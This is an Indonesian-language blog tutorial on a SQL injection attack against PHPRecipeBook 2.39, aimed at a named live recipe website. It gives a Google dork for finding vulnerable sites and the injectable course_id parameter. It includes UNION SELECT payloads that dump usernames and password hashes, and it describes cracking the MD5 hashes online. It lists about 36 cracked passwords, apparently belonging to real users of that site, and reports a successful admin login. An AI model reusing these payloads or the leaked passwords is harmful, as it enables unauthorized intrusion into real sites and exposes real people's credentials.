Kelemahan Remote SQL Injection Exploit



SQL Injection pada PHPRecipeBook 2.39

Nah, Pada Kesempatan Ini Saya Akan Membahas Tentang Kelemahan  SQL Injection.
Kali Ini Yang kita targetkan adalah  PHPRecipeBook versi 2.39. 

PHP Recipebook yaitu adalah Script PHP OpenSource Untuk Resep Makanan

Kalian bisa download Scripti Php Ini  ini di: http://sourceforge.net/projects/phprecipebook (Free OpenSource)

Disarankan untuk mencobanya di localhost, atau jika ingin mempraktikan sebaiknya kalian menggunakan proxy.
 mari kita cari targetnya dulu, pastinya lewat gooogle.
Gunakan syntax:inurl:"/index.php?m=" "PHPRecipeBook 2.39"




Wah Ternyata Pencarian  Menghasilkan Banyak sekali situs. Tampaknya ada situs yang membuat saya tertarik yaitu www.lowcarbohydratefoods.net



Wah, baru di klik aja langsung muncul resepnya hehehe, 
Oke, langsung kita mulai saja injectnya.

Kelemahan terdapat pada file index.php, terutama di bagian Search Yaitu:
index.php?m=recipes&a=search&search=yes&course_id=[Nah Disini]
Nah Bagian Tulisan yang berwarna merah bisa diisi dengan code code seperti: 

-7+union+select+1,user_login,3,4,5,6,7+from+security_users—

Jika Kode Diatas Sudah Dimasukan, Maka nantinya akan  muncul daftar username yang terdapat pada situs ini, untuk bisa mengetahui passwordnya cukup ganti user_login menjadi user_password 
(Sesuai dengan table security_users) menjadi seperti kode dibawah  ini : 
-7+union+select+1,user_password,3,4,5,6,7+from+security_users— 


Nah ini daftar username yang ada:

 

Kita bisa melihat banyak sekali username , kalian bisa melihat di tengah - tengah ada username admin (nah itu target kita) , nah sekarang kita coba cari tau passwordnya 


Wahhhh!!! TERNYATA  PASSWORDNYA SEGUDANG!!! Di DECODE LAGI!!! 

Kita harus mencari tau password (ADMIN)  tapi kalo di hitung admin berada di urutan nomer 11
tapi ini tidak menjamin bahwa password admin berada di urutan nomer 11, jadi untuk mencoba kita coba password urutan nomer 11.

Untuk Memakai Password Tersebut , kita membutuhan sebuah md5 decrypter untuk men decrypt md5 hash passwordnya. Kali ini saya memakai tools yang disediakan  oleh kerinci.net yang bisa diakses di http://tools.kerinci.net/?x=md5 . 


Setelah hash berhasil ditemukan, muncul  angka 8624266 sebagai hasilnya, selanjutnya langsung saja saya coba !


Waduh Ternyata Gagal , tapi sayamemutuskan untuk tidak menyerah begitu saja!!! 
Baiklah Saya akan mencoba semua pasawordnya, Saya akan mencoba dengan 48 password hash dari yang pertama.

[ 222222 ]
[ michael1 ]
[ nascar ]
[ cullen ]
[ kelsey ]
[ erica ]
[ booloo ]
[ snoopy ]
[ kruiden ]
[ 8624266 ]
[ anaforlife ]
[ 228233 ]
[ letmein ]
[ 1023jo ]
[ christina ]
[ ophelia ]
[ bailey ]
[ ribber ]
[ domino ]
[ john1953 ]
[ jimmys ]
[ 091302 ]
[ blwalk ]
[ wisdom ]
[ russell ]
[ james1 ]
[ 031972 ]
[ sacsbc ]
[ iluvthom ]
[ heidiboo ]
[ samuel ]
[ RAPHAEL1 ]
[ qaz2wsx ]
[ edmonton ]
[ gurli6 ]
[ 9676 ]

Baiklah saya akan mencobanya , Tapi Tidak Dengan Bantuan Brutus !!



Dan Setelah Beberapa lama mencoba akhirnya berhasil login !!






*****TERIMA KASIH*****

Posting Komentar

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.